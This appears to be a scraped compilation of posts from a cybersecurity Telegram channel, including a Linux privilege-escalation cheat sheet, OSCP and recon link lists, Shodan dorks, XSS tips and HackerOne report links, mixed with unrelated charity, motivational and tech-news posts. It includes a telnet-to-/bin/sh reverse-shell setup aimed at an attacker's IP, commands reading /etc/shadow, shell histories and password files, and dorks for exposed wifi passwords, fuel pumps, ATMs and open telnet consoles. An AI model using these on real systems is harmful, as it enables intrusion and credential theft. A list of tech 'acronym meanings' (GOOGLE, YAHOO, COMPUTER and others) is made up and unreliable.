𝙏𝙝𝙚 𝙇𝙞𝙣𝙪𝙭 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣 𝘾𝙝𝙚𝙖𝙩𝙨𝙝𝙚𝙚𝙩

Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release


What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

https://medium.com/@Bhichher/open-redirect-vulnerability-some-common-payloads-fd1dcd73541c


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

https://github.com/curated-intel/Initial-Access-Broker-Landscape


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

OSCP_Helpful_Links.md

OSCP Course Review
Offensive Security’s PWB and OSCP — My Experience
http://www.securitysift.com/offsec-pwb-oscp/

OSCP Journey
https://scriptkidd1e.wordpress.com/oscp-journey/

Down with OSCP
http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/

Jolly Frogs - Tech Exams (Very thorough)

http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html

OSCP Inspired VMs and Walkthroughs
https://www.hackthebox.eu/

https://www.root-me.org/

https://www.vulnhub.com/

Walk through of Tr0ll-1 - Inspired by on the Trolling found in the OSCP exam
https://highon.coffee/blog/tr0ll-1-walkthrough/
Another walk through for Tr0ll-1
https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/
Taming the troll - walkthrough
https://leonjza.github.io/blog/2014/08/15/taming-the-troll/
Troll download on Vuln Hub
https://www.vulnhub.com/entry/tr0ll-1,100/

Sickos - Walkthrough:
https://highon.coffee/blog/sickos-1-walkthrough/
Sickos - Inspired by Labs in OSCP
https://www.vulnhub.com/series/sickos,70/

Lord of the Root Walk Through
https://highon.coffee/blog/lord-of-the-root-walkthrough/
Lord Of The Root: 1.0.1 - Inspired by OSCP
https://www.vulnhub.com/series/lord-of-the-root,67/

Tr0ll-2 Walk Through
https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/
Tr0ll-2
https://www.vulnhub.com/entry/tr0ll-2,107/

Cheat Sheets
Penetration Tools Cheat Sheet
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

Pen Testing Bookmarks
https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md

OSCP Cheatsheets
https://github.com/slyth11907/Cheatsheets

CEH Cheatsheet
https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf

Net Bios Scan Cheat Sheet
https://highon.coffee/blog/nbtscan-cheat-sheet/

Reverse Shell Cheat Sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/

NMap Cheat Sheet
https://highon.coffee/blog/nmap-cheat-sheet/

Linux Commands Cheat Sheet
https://highon.coffee/blog/linux-commands-cheat-sheet/

Security Hardening CentO 7
https://highon.coffee/blog/security-harden-centos-7/

MetaSploit Cheatsheet
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

Google Hacking Database:
https://www.exploit-db.com/google-hacking-database/

Windows Assembly Language Mega Primer
http://www.securitytube.net/groups?operation=view&groupId=6

Linux Assembly Language Mega Primer
http://www.securitytube.net/groups?operation=view&groupId=5

Metasploit Cheat Sheet
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

A bit dated but most is still relevant

http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html

NetCat

http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf

http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf

http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html

http://h.ackack.net/cheat-sheets/netcat

Essentials
Exploit-db
https://www.exploit-db.com/

SecurityFocus - Vulnerability database
http://www.securityfocus.com/

Vuln Hub - Vulnerable by design
https://www.vulnhub.com/

Exploit Exercises
https://exploit-exercises.com/

SecLists - collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads
https://github.com/danielmiessler/SecLists

Security Tube
http://www.securitytube.net/

Metasploit Unleashed - free course on how to use Metasploit
https://www.offensive-security.com/metasploit-unleashed/

0Day Security Enumeration Guide http://www.0daysecurity.com/penetration-testing/enumeration.html

Github IO Book - Pen Testing Methodology
https://monkeysm8.gitbooks.io/pentesting-methodology/

Hey all of you ❤️❤️❤️

We know you are interested in cyber security We have a offer for all of you

❤️❤️❤️❤️If you help poor peoples on This diwali and share pics in our chat group @freelearningtech21 then we will make a videos for you about cyber security and share in our group free of cost❤️❤️❤️❤️


❤️❤️❤️❤️Don't waste your money on Firecrackers , Make diwali of the same money with the poor peoples❤️❤️❤️❤️


Thanks...................


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

👉👉👉Acquisitions

Let's understand Acquisition by giving you example as if your target is google.com, if we find the acquisitions of google.com, then we get more domains that google has acquired, here if you can access the server through that domain. In this case it can be useful for you.To do all this, this website helps you


https://www.crunchbase.com/

First you have to search your target on searchbox like (google) after that then you see the Acquisitions options click on that

There you can get more domains that google has acquired

👉👉👉ASN Enumeration

All companies or organization have their own unique ASN no which the identity of that company. In this case, subdomains can also be found using the same ASN no, but first you have to find ASN no, for this you can use the website

https://bgp.he.net/

When you got asn no for your target then go to kali linux and use amass tool

Command - amass intel -asn 55023

After use this command you see you get a more subdomains of your target


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

Hey

I have share here some motivational youTube channels links bcoz these channels will be too much help me in my bad time may be these channels helpful for you also.

Jeet fix - https://youtube.com/c/JeetFixOfficial

Sanaki motivation - https://youtube.com/c/SanakiMotivation

Sidhi jalebi - https://youtube.com/c/sidhijalebi

Sonu sharma - https://youtube.com/c/SONUSHARMAMotivation

Sandeep Maheshwari - https://youtube.com/c/SandeepSeminars

Dr Vivek bindra - https://youtube.com/c/MrVivekBindra

Ujjwal Patni -https://youtube.com/c/UjjwalPatni

❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

Rubber ducky

Rubber ducky is Hardware Hacking Device It is also called BAD USB Because Rubber ducky is a USB Hacking device that autorun as soon as any Script or Computer Virus is plug on the USB Port .

Original Rubber ducky Price is approx 50$ But there are some alternative tools also available here we will tell you Rubber ducky alternatives.

Original price - Click here

Here are some alternative Rubber ducky Devices which i used personally

We also used Mini Leonardo Pro Micro - Click Here

We also used ATTINY85 Digispark - Click Here

We also used Arduino UNO R3 - Click Here

We don't use this but its also a Rubber Ducky alternative Raspberry Pi Pico - Click Here

There are other Rubber ducky alternative also Node MCU and wifi Duck but these devices is used like a diffrenet way

Node MCU - Click Here

I would've loved these products if i had to be you. Go for it if you need it.

Article link - https://freelearningtech.in/how-to-make-a-usb-rubber-ducky/

❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

THESE ARE THE MEANING OF THE FOLLOWING ABBREVIATIONS.
_______________

1.) GOOGLE - Global Organization Of Oriented Group Language Of Earth.
2.) YAHOO - Yet Another Hierarchical Officious Oracle.
3.) WINDOW - Wide Interactive Network Development for Office work Solution.
4.) COMPUTER - Common Oriented Machine Particularly United and used under Technical and Educational Research.
5.) VIRUS - Vital Information Resources Under Siege.
6.) UMTS - Universal Mobile Telecommunicati ons System.
7.) AMOLED - Active-matrix organic light-emitting diode.
8.) OLED - Organic light-emitting diode.
9.) IMEI - International Mobile Equipment Identity.
10.) ESN - Electronic Serial Number.
11.) UPS - Uninterruptible power supply.
12. HDMI - High-Definition Multimedia Interface.
13.) VPN - Virtual private network.
14.) APN - Access Point Name.
15.) SIM - Subscriber Identity Module.
16.) LED - Light emitting diode.
17.) DLNA - Digital Living Network Alliance.
18.) RAM - Random access memory.
19.) ROM - Read only memory.
20.) VGA - Video Graphics Array.
21.) QVGA - Quarter Video Graphics Array.
22.) WVGA - Wide video graphics array.
23.) WXGA - Widescreen Extended Graphics Array.
24.) USB - Universal serial Bus.
25.) WLAN - Wireless Local Area Network.
26.) PPI - Pixels Per Inch.
27.) LCD - Liquid Crystal Display.
28.) HSDPA - High speed down-link packet access.
29.) HSUPA - High-Speed Uplink Packet Access.
30.) HSPA - High Speed Packet Access.
31.) GPRS - General Packet Radio Service.
32.) EDGE - Enhanced Data Rates for Globa Evolution.
33.) NFC - Near field communication.
34.) OTG - On-the-go.
35.) S-LCD - Super Liquid Crystal Display.
36.) O.S - Operating system.
37.) SNS - Social network service.
38.) H.S - HOTSPOT.
39.) P.O.I - Point of interest.
40.) GPS - Global Positioning System.
41.) DVD - Digital Video Disk.
42.) DTP - Desk top publishing.
43.) DNSE - Digital natural sound engine.
44.) OVI - Ohio Video Intranet.
45.) CDMA - Code Division Multiple Access.
46.) WCDMA - Wide-band Code Division Multiple Access.
47.) GSM - Global System for Mobile Communications.
48.) WI-FI - Wireless Fidelity.
49.) DIVX - Digital internet video access.
50.) APK - Authenticated public key.
51.) J2ME - Java 2 micro edition.
52.) SIS - Installation
53.) DELL - Digital electronic link library.
54.) ACER - Acquisition Collaboration Experimentation Reflection.
55.) RSS - Really simple syndication.
56.) TFT - Thin film
57.) AMR- Adaptive Multi-Rate.
58.) MPEG - moving pictures experts group.
59.) IVRS - Interactive Voice Response System.
60.) HP - Hewlett
Packard.

❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

Here are some of the tools that we use when we perform Live Recon

Recon-ng - https://github.com/lanmaster53/recon-ng
httpx - https://github.com/projectdiscovery/httpx
isup.sh - https://github.com/gitnepal/isup
Arjun - https://github.com/s0md3v/Arjun
jSQL - https://github.com/ron190/jsql-injection
Smuggler - https://github.com/defparam/smuggler
Sn1per - https://github.com/1N3/Sn1per
Spiderfoot - https://github.com/smicallef/spiderfoot
Nuclei - https://github.com/projectdiscovery/nuclei
Jaeles - https://github.com/jaeles-project/jaeles
ChopChop - https://github.com/michelin/ChopChop
Inception - https://github.com/proabiral/inception
Eyewitness - https://github.com/FortyNorthSecurity/EyeWitness
Meg - https://github.com/tomnomnom/meg
Gau - Get All Urls https://github.com/lc/gau
Snallygaster - https://github.com/hannob/snallygaster
NMAP - https://github.com/nmap/nmap
Waybackurls - https://github.com/tomnomnom/waybackurls
Gotty - https://github.com/yudai/gotty
GF - https://github.com/tomnomnom/gf
GF Patterns - https://github.com/1ndianl33t/Gf-Patterns
Paramspider - https://github.com/devanshbatham/ParamSpider
XSSER - https://github.com/epsylon/xsser
UPDOG - https://github.com/sc0tfree/updog
JSScanner - https://github.com/dark-warlord14/JSScanner
Takeover - https://github.com/m4ll0k/takeover
Keyhacks - https://github.com/streaak/keyhacks
S3 Bucket AIO Pwn - https://github.com/blackhatethicalhacking/s3-buckets-aio-pwn
BHEH Sub Pwner Recon - https://github.com/blackhatethicalhacking/bheh-sub-pwner
GitLeaks - https://github.com/zricethezav/gitleaks
Domain-2IP-Converter - https://github.com/blackhatethicalhacking/Domain2IP-Converter
Dalfox - https://github.com/hahwul/dalfox


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

i am sure You have listen about whois but here we will tell you about Reverse Whois.

For Reverse WHOIS you can use whoxy website, as we are running the target of google ,there will also be the owner of google, whose name you will get from google, find other domains by the same name.

you have to do the reverse WHOIS of your target while bug hunting, here you get the option to reverse WHOIS by company name, owner name, email address and domain keyword.

Website - https://www.whoxy.com/

First you visit this website then you see search box in this website and there is dropdown menu there you can get a option for Reverse Whois.

When you do Reverse whois you see you can get a more domains which is acquired by your target owner.

After that you can get a more subdomains using shodan. I know you have already know about Google dorking but shodan dorks is also available and helpful for finding more subdomains. If you use shodan for finding subdomains then first you create an account.

Website - https://www.shodan.io/

example - ssl:"google.com"

Here is a list of some shodan dorks.

👉👉👉👉👉

Basic Shodan Filters

city:
Find devices in a particular city.
city:"Bangalore"

country:
Find devices in a particular country.
country:"IN"

geo:
Find devices by giving geographical coordinates.
geo:"56.913055,118.250862"

hostname:
Find devices matching the hostname.
server: "gws" hostname:"google"

net:
Find devices based on an IP address or /x CIDR.
net:210.214.0.0/16

os:
Find devices based on operating system.
os:"windows 7"

port:
Find devices based on open ports.
proftpd port:21

before/after:
Find devices before or after between a given time.
apache after:22/02/2009 before:14/3/2010

Citrix:
Find Citrix Gateway.
title:"citrix gateway"

Wifi Passwords:
Helps to find the cleartext wifi passwords in Shodan.
html:"def_wirelesspassword"

Surveillance Cams:
With username:admin and password: :P
NETSurveillance uc-httpd

Fuel Pumps connected to internet:
No auth required to access CLI terminal.
"privileged command" GET

Windows RDP Password:
But may contain secondary windows auth
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

Mongo DB servers:
It may give info about mongo db servers and dashboard
"MongoDB Server Information" port:27017 -authentication

FTP servers allowing anonymous access:
Complete Anon access
"220" "230 Login successful." port:21

Jenkins:
Jenkins Unrestricted Dashboard
x-jenkins 200

Hacked routers:
Routers which got compromised
hacked-router-help-sos

Open ATM:
May allow for ATM Access availability
NCR Port:"161"

Telnet Access:
NO password required for telnet access.
port:23 console gateway

Misconfigured Wordpress Sites:
The wp-config.php if accessed can give out the database credentials.
http.html:"* The wp-config.php creation script uses this file"

Hiring:
Find sites hiring.
"X-Recruiting:"

Android Root Bridge:
Find android root bridges with port 5555.
"Android Debug Bridge" "Device" port:5555

Etherium Miners:
Shows the miners running ETH.
"ETH - Total speed"

Tesla Powerpack charging Status:
Helps to find the charging status of tesla powerpack.
http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

👉👉👉👉👉

If you want to getting more information about shodan dorks then read this article - https://thedarksource.com/shodan-cheat-sheet/


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

LATEST TECHNOLOGY AND CYBERNEWS

BY @cybermonkeyofficials

🌐FACEBOOK CHANGES ITS COMPANY NAME TO 'META'

🌐INDIAN GOVERNMENT STARTS PROBE AGAINST FACEBOOK SEEKS INFO ABOUT ITS ALGORITHM

🌐DELHI HC NOTICE TO RBI, SBI OVER BANNING UPI PAYMENTS IN CRYPTO EXCHANGES

🌐SPACEX SPACESHIP FACED URINE LEAK ISSUE DURING ITS FIRST PRIVATE FLIGHT

🌐APPLE SUED FOR NOT PROVIDING IPHONE CHARGER IN CHINA : REPORTS

🌐JAPANESE STARTUP DEMONSTRATES ITS AI-EQUIPPED ROBOTIC ARM IN SPACE

🌐IT MINISTRY TO ISSUE FAQS ON INTERMEDIARY GUIDELINES SOON :SOURCES

🌐MICROSOFT TO WORK WITH COMMUNITY COLLEGES TO FILL 250,000 CYBER JOBS

🌐US BAN ON CHINA TELECOM IS MALICIOUS SUPPRESSION SAYS BEIJING

🌐TRUECALLER VERIFIES IRCTC'S 139 HELPLINE NUMBER

🌐AUSTRALIA PLANS TO MAKE GOOGLE OFFER ALTERNATIVE SEARCH ENGINES ON SMARTPHONES

🌐SC ALLOWS GOVT APPEAL AGAINST GIVING AIRTEL RS 923 CRORE AS GST REFUND

🌐ACER SUFFERS ANOTHER CYBER ATTACK WITHIN WEEKS , HACKERS WARNED OF MORE VULNERABLE SERVERS

🌐CIA SOUGH REVENGE AGAINST JULIAN ASSANGE OVER HACKING TOOLS LEAKS COURT HEARS
URGENT WARNING AS

🌐WORDPRESS BUG ALLOWS HACKERS TO DELETE YOUR ENTIRE SITE IN MASSIVE SECURITY FLAW


DO FOLLOW


❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

hey all of you i told you before some days for this diwali contribute for poor peoples


Read this msg - https://t.me/freelearningtech/386

Now i am going to 5 nov bcoz 4 nov is already booked in Bhai Kanhiya Manav Seva Trust Ashram


website - http://www.bkmstrust.org

I will share here approx 300 people's bread pakoda meal at 3 pm and i will share images in our group @freelearningtech21 also if you also do something like this i promise you i will teach you about Cyber security in free of cost in video's format

❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

we give you some tips related to cross site scripting tips. It happens many times when we try more cross site scripting payloads on a website, in such a website, we block the browser, in such a way, you clear the cookies of the browser.

If you search this query ("xss.ht") on google in this way, in such a way you get to know what kind of cross site scripting payloads are trying on which website, which bug hunter is trying.

Similarly, you can also find the cross site scripting bug by using unicode Cross site scripting payloads as you can see. There is a payload in a unicode format which has been converted.

Website - https://www.online-toolz.com/tools/text-unicode-entities-convertor.php

This happens very often normally payload is not run, in such a way unicode payloads can be tried, here you are given a cheatsheet of owasp which you can use to find XSS.

Website - https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

❤️❤️ Enjoy and Share ❤️❤️

Support Us ❤️
Channel : @freelearningtech
Group : @freelearningtech21
Website : https://freelearningtech.in/

HackerOne-Reports:
Broken link profile in the website leads to identity theft.
https://hackerone.com/reports/1343733

Lacework disclosed a bug submitted by spyata: https://hackerone.com/reports/1343733

[Java] CWE-502: Unsafe deserialization with three JSON frameworks
https://hackerone.com/reports/1368720

GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1368720 - Bounty: $1800

[Python]: CWE-117 Log Injection
https://hackerone.com/reports/1368721

GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1368721 - Bounty: $1800

[cpp] CWE-787: query to detect unsigned integer to signed integer conversions used in pointer arithmetics
https://hackerone.com/reports/1378946

GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1378946

[Java] CWE-552: Unsafe url forward
https://hackerone.com/reports/1378947

GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1378947 - Bounty: $1800

XSS on tiktok.com
https://hackerone.com/reports/1322104

TikTok disclosed a bug submitted by arifmkhls: https://hackerone.com/reports/1322104 - Bounty: $2000

Script breaking tag (Forces website to render blank) (Informative)
https://hackerone.com/reports/1355537

XVIDEOS disclosed a bug submitted by ch1ck3n42: https://hackerone.com/reports/1355537 - Bounty: $150

Image queue default key of 'None' and GraphQL unhandled type exception
https://hackerone.com/reports/996041

Reddit disclosed a bug submitted by moblig: https://hackerone.com/reports/996041 - Bounty: $500

Exposed PHP dependencies at .8x8.com
https://hackerone.com/reports/1132457

8x8 disclosed a bug submitted by ian: https://hackerone.com/reports/1132457

Dependency on private SSH keys in public github
https://hackerone.com/reports/974176

Agoric disclosed a bug submitted by pacmanx: https://hackerone.com/reports/974176

Reflected XSS at via = parameter
https://hackerone.com/reports/1305472

U.S. Dept Of Defense disclosed a bug submitted by zhenwarx: https://hackerone.com/reports/1305472

AWS subdomain takeover of www.
https://hackerone.com/reports/1329792

U.S. Dept Of Defense disclosed a bug submitted by al-madjus: https://hackerone.com/reports/1329792

Bypassing the Grammarly plagiarism checker by simply replacing characters in the source text
https://hackerone.com/reports/1282282

Grammarly disclosed a bug submitted by evilksandr: https://hackerone.com/reports/1282282

HTML Injection on tiktoktutorials via firstName parameter
https://hackerone.com/reports/1343492

TikTok disclosed a bug submitted by siratsami: https://hackerone.com/reports/1343492

critical server misconfiguration lead to access to any user sensitive data which include user email and password
https://hackerone.com/reports/1365738

Flickr disclosed a bug submitted by mr_robert: https://hackerone.com/reports/1365738 - Bounty: $500